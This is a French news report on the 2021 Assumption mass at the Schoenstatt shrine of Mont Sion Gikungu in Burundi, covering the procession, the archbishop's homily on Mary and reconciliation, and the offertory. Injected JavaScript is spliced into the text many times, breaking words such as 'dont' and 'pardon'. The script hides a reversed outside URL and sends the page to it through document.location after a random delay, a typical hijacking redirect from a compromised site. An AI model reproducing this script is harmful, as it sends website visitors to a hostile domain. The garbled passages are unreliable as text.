to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif; »>La solennité de l’Assomption de la Vierge Marie 2021 a été célébrée avec pompe au sanctuaire marial de Schoenstatt de la Paix et la Réconciliation de Mont Sion Gikungu. Parmi les pèlerins venus très nombreux, étaient présents les hautes personnalités du pays toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont les anciens présidents, le Premier Vice-président, les ministres et autres. La messe de 10h00, animée conjointement par les chorales Sainte Famille, Saint Nicholas de Flüe et Pueri Cantores Maria Goretti, était rehaussée par son Excellence l’Archevêque de Bujumbura, Monseigneur Gervais BANSHIMIYUBUSA, le Père Supérieur général des Pères de Schoenstatt, Joan Pablo CATOGGIO, ainsi que de nombreux prêtres et religieux. La messe a débuté par une procession qui a commencé par des honneurs militaires, dans l’ordre ci-après : Thuriféraires – Croix- Image de la Vierge Marie (portée par les étudiants de l’ISCAM) – 12 pèlerins avec MTA (Mère Trois fois Admirable) couronnée – Apôtres de la Vierge Pèlerine avec MTA – 12 enseignant-éducateurs (portant des bougies allumées) – les jeunes filles danseuses- les danseurs Intore – Chorale Sainte Famille- Servants de messe – prêtres – Archevêque. Les lectures de la solennité étaient : première lecture : Ap 11, 19a; 12, 1-6a. 10ab, Psaume Responsorial 44, 10bc. 11. 12ab. 16, deuxième lecture : 1Co15, 20-27a et Évangile : Lc 1, 39 -56.
Dans un petit mot d’accueil des pèlerins venus de tous les horizons, le Père Recteur du sanctuaire Herménégilde COYITUNGIYE leur a souhaité bonne fête de l’Assomption de la Bienheureuse Vierge Marie et un chaleureux bienvenu. Il a déclaré que la joie qui était manifestée parmi les pèlerins au Sanctuaire était comme celle éprouvée par les chrétiens quand le Pape Pie XII a proclamé la solennité de l’Assomption, puisque la Vierge Marie elle-même a déclaré que cette joie se transmettra de génération en génération. Il a alors appelé les chrétiens à accueillir l’Archevêque, le Père Supérieur général des Peres de Schoenstatt, les prêtres pèlerins sans oublier le tout jeune prêtre récemment ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné, le Père Japhet SIMBIZI, les hautes personnalités ainsi les différents groupes de pèlerins toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont les Apôtres de la Vierge Pèlerine et les enseignant-éducateurs, … Il a en outre fait savoir que le Sanctuaire s’était préparé à ce grand jour notamment par la neuvaine de prière et les enseignements. Le Père Herménégilde n’a pas oublié de rappeler que cela faisait déjà 12 ans de couronnement de la Vierge Marie au Sanctuaire et 60 ans que le Burundi était consacré à la Vierge. Avant d’inviter l’Archevêque à continuer avec la célébration eucharistique, le Père COYITUNGIYE a déclaré qu’au Sanctuaire, on se réjouit dans la Vierge Marie avec les anges puisqu’elle a accepté de trôner au Mont Sion Gikungu, et d’inviter les pèlerins à disposer leurs cœurs à recevoir beaucoup de grâces du jour.
L’Archevêque Monseigneur Gervais BANSHIMIYUBUSA a à son tour invité les chrétiens à acclamer le Père Recteur. Il a alors fait savoir que quand nous venons vers Marie, c’est elle-même qui nous accueille dans ses bras grandement ouverts, nous rassemblant dans cette unité que son enfant est venu nous enseigner. Il a alors annoncé que pour que nos ovations et prières à Marie lui plaisent, il faut d’abord que chacun pense à toute personne qui lui cause des ennuis et à celle à qui il cause des ennuis, pour que le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don arrive dans nos ménages, familles et tout le pays, afin qu’il y ait la paix et la réconciliation véritable.
Signalons que dès samedi soir, il y avait vigile de l’Assomption de la Bienheureuse Vierge Marie par des pèlerins venus très nombreux des différents coins du pays jusqu’au petit matin.
Homélie
Commençant son homélie, l’Archevêque a déclaré qu’en ce jour nous nous joignons à Sainte Elizabeth dans sa salutation et bénédiction à Marie, cette mère à qui Jésus Christ nous a confiés, disant : « Bienheureuse celle qui as cru: ce qui lui a été dit de la part du Seigneur s’accomplir ». Lc 1, 46. C’est là où réside le bonheur de Marie; elle est devenue la Mère de l’humanité puisque rien n’est impossible à Dieu. Marie est bienheureuse puisqu’elle a fait la volonté de Dieu. Ainsi quiconque veut être bienheureux, qu’il accomplisse la volonté de Dieu, a fait savoir l’Archevêque.
Il a annoncé que ce jour nous célébrons l’Assomption de Marie, mais pas parce que Marie se trouve au ciel, puisqu’au ciel il y a beaucoup de saints comme Jean le dit ; mais c’est parce qu’elle est entrée au ciel le corps et l’âme. Un privilège très spécial que les autres saints auront le dernier jour, comme nous le trouvons dans le cretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do, « J’attends la résurrection des morts ». Rien n’est surprenant pourtant, puisque Marie est la mère du Verbe, le Fils de Dieu Tout Puissant qui s’est fait homme, a fait remarqué l’Archevêque. Jean nous montre Marie dans un temple de Dieu vêtue du soleil, la lune sous ses pieds avec une couronne de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze étoiles. Ce sont tous de grands signes que Jean a reçu en vision. La Vierge Marie est au ciel le corps et l’âme, non pas parce qu’elle est sainte, mais plutôt parce qu’elle la Reine du ciel et de la terre. Même dans le passé un roi pouvait avoir beaucoup de reines, mais une seule pouvait s’appeler reine-mère (Umugabekazi), c’est-à-dire la Mère du successeur. La Vierge Marie est Reine et Reine-mère à la fois puisque Jésus est devenu le Roi du ciel et de la terre. Dans le Burundi ancien, la reine-mère devenait alors la favorite du roi, puisqu’elle lui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnait un successeur quand il ne sera plus au pouvoir. Tout ce qu’elle demandait au roi ou à son fils, elle l’obtenait, a lancé Monseigneur Gervais.
C’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc un privilège que nous avons, nous les chrétiens, d’avoir une mère qui est devenue la Reine du ciel et de la terre et qui trône au ciel corps et âme. Nous devons alors nous consacrer à elle de plus en plus pour qu’elle intercède pour nous, et qu’un jour nous soyons à ses côtés, ayant accompli la volonté de Dieu comme elle l’a fait, a-t-il recommandé. Elizabeth s’exclame « Bienheureuse celle qui a cru ». Et l’Ange proclame, « …celui qui va naitre sera saint et sera appelé Fils de Dieu ». C’est tout d’abord ce mot que Marie a conçu dans la foi, avant que le Verbe se fasse chair, signale l’Archevêque.
L’Archevêque de Bujumbura a terminé son homélie en révélant aux pèlerins que tout cela signifie que la voie la plus directe vers le ciel c’est croire en Dieu et tout ce qu’Il dit, et puis observer ses commandements. Quand Moïse est revenu de sa rencontre avec Dieu, il a amené avec lui les dix commandements, comme des garde-fous de la conduite des gens, et comme le résumé de la Parole de Dieu. Ici au Mont Sion Gikungu, Marie a été couronnée puisqu’elle a obéi Dieu, a-t-il lancé. Il a alors appelé les chrétiens à essayer de s’habituer à lire, se rappeler et méditer les commandements et à voir ce qu’ils nous disent dans notre vie de chaque jour. Comme cela, le chemin de la paix et la réconciliation nous sera facile. Si nous cherchons ailleurs, si nous cherchons d’autres stratégies, tout sera vain. Plus nous utiliserons des ruses pour truquer et écarter les autres, plus on reviendra à la même chose, l’échec. Mais si nous observons les commandements tout sera réussite. C’est pourquoi dans les prières des chrétiens, on se rappelle toujours des commandements, se demandant, « Est-ce qu’aujourd’hui j’ai obéi à Dieu ? ». Que chacun fasse une introspection. Mais le problème est que souvent, quand nous méditons les commandements, nous voyons surtout les égarements des autres pas les nôtres. Si jamais on respecte les commandements, dans nos familles, nos ménages et notre pays, la paix et la réconciliation régneront. Nous aurons honte du péché devant Dieu et les hommes et nous ne pécherons plus et nous pourrons construire un pays des hommes réconciliés, a conclu l’Archevêque.
L’Archevêque a fini son homélie par une intercession à la Vierge Marie : « Ce jour où nous célébrons la Vierge Marie, qu’elle nous aide à nous réconcilier dans notre pays, pour être des gens véritablement réconciliés, pour que notre pays soit caractérisé par une paix durable. Marie, Notre Reine de la Paix et la Réconciliation, prie pour nous ». Amen !
Offertoire
L’offertoire a été une occasion d’offrir différents symboles et offrandes en nature.
Premièrement, on a offert un tambour avec une bible ouverte portés par deux fratri, symbole que la royauté de Jésus et la Vierge Marie s’établisse et que la Parole de Dieu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être reçue dans nos cœurs puisque c’est la source même des commandements que nous devons suivre comme notre Mère Marie.
Deuxièmement, on a offert un bouquet des Lys, porté par une petite fille, qui rappellent la bonté et la loyauté de la Vierge Marie ; avec deux bagues d’alliance portés par un couple de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze ans de mariage, symbole de demande de l’unité dans les familles, le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don du partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don et de la réconciliation partout où l’amour manque.
Troisièmement, on a offert un gros pot de vin de banane, porté par un homme, symbole d’intimité et de partage pour demander la réconciliation parmi les frères. On a offert aussi des offrandes en nature dans plusieurs paniers et enfin les offrandes d’autel portées par six jeunes filles dans des corbeilles contentant les oblats de la sainte messe.
Parole du Père Supérieur General des Peres de Schoenstatt
Le Père Supérieur général des Pères de Schoenstatt, Joan Pablo CATOGGIO, a exprimé ses sentiments de remerciement à l’Archevêque de Bujumbura, et a souhaité bienvenue à tous les chrétiens en ce grand jour au ciel et sur terre.
Il a annoncé qu’on célèbre la Vierge Marie Reine du ciel et de la terre, qui est au ciel dans la gloire avec son fils. Elle est au ciel avec les anges, mais aussi avec nous. Elle est Reine du ciel et de la terre, surtout dans le sanctuaire de Mont Sion Gikungu. Dans le sanctuaire, la Vierge Marie nous accueille comme ses enfants, et le sanctuaire est comme l’entrée du ciel, a-t- il dit. Dans le sanctuaire, on voit Marie comme éducatrice de tous : enfants, hommes, femmes. Nous sommes très heureux d’être ici, et nous sommes prêts à recevoir les grâces que la Vierge va nous accorder. Ici nous avons couronné la Vierge Marie, pour qu’elle nous aide à avoir la paix et la réconciliation dans nos familles, notre pays et dans le monde entier, a annoncé le Père supérieur.
Il a terminé son petit mot en appelant les chrétiens à se Consacrer à la Vierge Marie, pour qu’ils soient pour elle des bons outils pour la paix et la réconciliation au Burundi et dans le monde entier.
La messe a été clôturée par une procession vers le sanctuaire ou après avoir récité l’Angélus, les enseignants-éducateurs se sont consacrés à la Vierge Marie pour les aider à être de bons éducateurs. Les apôtres de la Vierge Pèlerine ont fait leur prière et l’Archevêque a béni des images de la Vierge Pèlerine et envoyé en mission les apôtres de la Vierge Pèlerine avant la prière de couronnement de la Vierge Marie et la bénédiction solennelle du jour.